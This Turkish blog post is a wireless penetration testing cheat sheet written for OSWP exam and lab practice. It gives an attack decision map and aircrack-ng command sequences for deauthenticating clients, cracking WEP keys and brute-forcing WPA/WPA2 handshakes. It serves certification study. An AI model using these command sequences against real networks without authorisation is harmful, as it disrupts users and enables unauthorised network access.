İçeriğe geç

Wireless Penetration Testing #Cheat Sheet

Aslında bu cheat sheet'i OSWP sınavım için hazırladım ama tabikide geliştirmeye devam edip, Wireless Testlerinde de kullanabileceğim bir duruma yavaş yavaş getireceğim. Ancak şu haliyle bile güzel bir cheat sheet olduğunu düşünüyorum. Özellikle lab ortamında böyle bir cheat sheet çok işinize yarayacaktır. Hadi başlayalım!

Öncesinde OSWP için Attack Map'imizi oluşturalım. Evet bu sayfayı oluştururken oldukça Burcu Yarar'dan esinlendim.

Attack Map

WEP mi, WPA/WPA2 mi?
- WEP
- - Open Authentication mu Shared Key Authentication mu?
- - - Open Authenticaton
- - - - Herhangi bir client ağa bağlı mı?
- - - - - Evet, bağlı:
- - - - - - # Arp Request Replay Saldırısı
- - - - - - # Interactive Packet Replay Saldırısı
- - - - - Hayır, bağlı değil:
- - - - - - # Korek ChopChop Saldırısı
- - - - - - # Fragmentation Attack
- - - Shared Key Authenticaton
- - - - Herhangi bir client ağa bağlı mı?
- - - - - Evet, bağlı:
- - - - - - # Fake Shared Key Authentication Saldırısı
- - - - - - # Arp Request Replay Saldırısı
- - - - - Hayır, bağlı değil:
- - - - - - Client bekle...

- WPA/WPA2
- - Herhangi bir client ağa bağlı mı?
- - - Evet, bağlı:
- - - - # 4'lü el sıkışmayı yakala ve kır
- - - Hayır, bağlı değil:
- - - - Client bekle...

Not: Yukarıdaki Attack Map'i hazırlarken en son aşamada # ile belirttiğim saldırı türlerini içeren toplu komutlar bu yazının en altında yer almaktadır. Direkt bu başlıklarla ilgili komutlara gidebilirsiniz.


Yararlı Olabilecek Komutlar

Yeni bir arayüz ekleme:

iw dev wlan0 interface add mon0 type monitor
ifconfig mon0 up

Arayüz silmek:

iw dev mon0 interface del

Monitor Mode:

airmon-ng start wlan0 1
---------
iw dev wlan0 interface add mon0 type monitor
ifconfig mon0 up

Mevcut frekans:

iwlist wlan0mon channel

Mevcut MAC adresi:

macchanger wlan0mon -s

airdecap-ng ile şifreli paketleri açmak:

airdecap-ng -w 0000000000 web-shared-01.cap
---------
airdecap-ng -e 'test' -p 'mjdpPd4D'  wpa2-01.cap -b '7A:2B:C1:63:BD:64'

Fake Authentication:

aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface name>

Shared Key Fake Authentication:

aireplay-ng -1 0 -e <ESSID> -y <sharedkey> -a <AP MAC> -h <Your MAC> <interface>

ARP Request Replay Saldırısı:

aireplay-ng -3 -b <AP MAC> -h <Source MAC> <interface name>

Deauthentication Saldırısı:

aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> <interface name>
---------
aireplay-ng -0 1 -a <AP MAC> <interface name>

Bir ARP Request paketi oluşturmak:

packetforge-ng -0 -a <AP MAC> -h <Your MAC> -k <Dest IP> -l <Source IP> -y <xor file> -w <output file>

Aireplay-ng ile KoreK ChopChop saldırısı:

aireplay-ng -4 -b <AP MAC> -h <Source MAC> <interface>

Interactive Packet Replay Saldırısı:

aireplay-ng -2 -r <packet filename> <interface>

Attack Map İçin Oluşturulmuş Komutlar

Cracking WEP Without Client - #KoreK ChopChop Saldırısı:

airodump-ng wlan0mon --bssid <AP MAC> -c <AP CHANNEL> -w ChopChop
aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface name>
aireplay-ng -4 -b <AP MAC> -h <Source MAC> <interface>
packetforge-ng -0 -a <AP MAC> -h <Your MAC> -k <Dest IP> -l <Source IP> -y <xor file> -w <output file>
aireplay-ng -2 -r <packet filename> <interface>
aircrack-ng ChopChop-01.cap

Cracking WEP With Client - # Arp Request Replay Saldırısı:

airodump-ng wlan0mon --bssid <AP MAC> -c <AP CHANNEL> -w webWithClient
aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface name>
aireplay-ng -3 -b <AP MAC> -h <Source MAC> <interface name>
aireplay-ng -0 1 -a <AP MAC> <interface name>
aircrack-ng webWithClient-01.cap

Cracking WEP via a Client - # Interactive Packet Replay Saldırısı:

aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface name>
airodump-ng wlan0mon --bssid <AP MAC> -c <AP CHANNEL> -w webViaClient
aireplay-ng -2 -a <bssid MAC address> -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -t 1 -f 0 <interface>
aircrack-ng webViaClient-01.cap

WEP Shared Key Authentication Attack - # Fake Shared Key Authentication Saldırısı:

airodump-ng -c <AP channel> --bssid <AP MAC> -w <capture> <interface>
aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> <interface>
aireplay-ng -1 0 -e <ESSID> -y <keystream file> -a <AP MAC> -h <Your MAC> <interface>
aireplay-ng -3 -b <AP MAC> -h <Your MAC> <interface>
aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> <interface>
aircrack-ng <capture>

Ekstra

Cracking WPA via Airolib-ng:

echo wifu > essid.txt
airolib-ng wifu --import essid essid.txt
airolib-ng wifu --stats
airolib-ng wifu --import passwd 
airolib-ng <db name> --batch
aircrack-ng -r <db name> <capture>

Cracking WPA via John:

john --wordlist=/usr/share/john/password.lst --rules --stdout | aircrack-ng -w - john-01.cap -e Huawei_HG655d
john --wordlist=/usr/share/john/password.lst --rules --stdout --session=wpa | aircrack-ng -w - john-01.cap -e Huawei_HG655d
#Session olarak kaydettiğimizden aircrack-ng'den çıktığımızda --restore ile kaldığımız yerden kırmaya devam edebiliriz.
john --restore=wpa |aircrack-ng -w - john-01.cap -e Huawei_HG655d

Crunch ile Dinamik Wordlist

crunch 8 8 12345678  | john --stdin --session=wpa --stdout | aircrack-ng -w - wpa-01.cap -b 7A:2B:C1:63:BD:64
crunch 8 8 12345678  | john --restore=wpa | aircrack-ng -w - wpa-01.cap -b 7A:2B:C1:63:BD:64
Kategori:Cheat SheetWireless

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir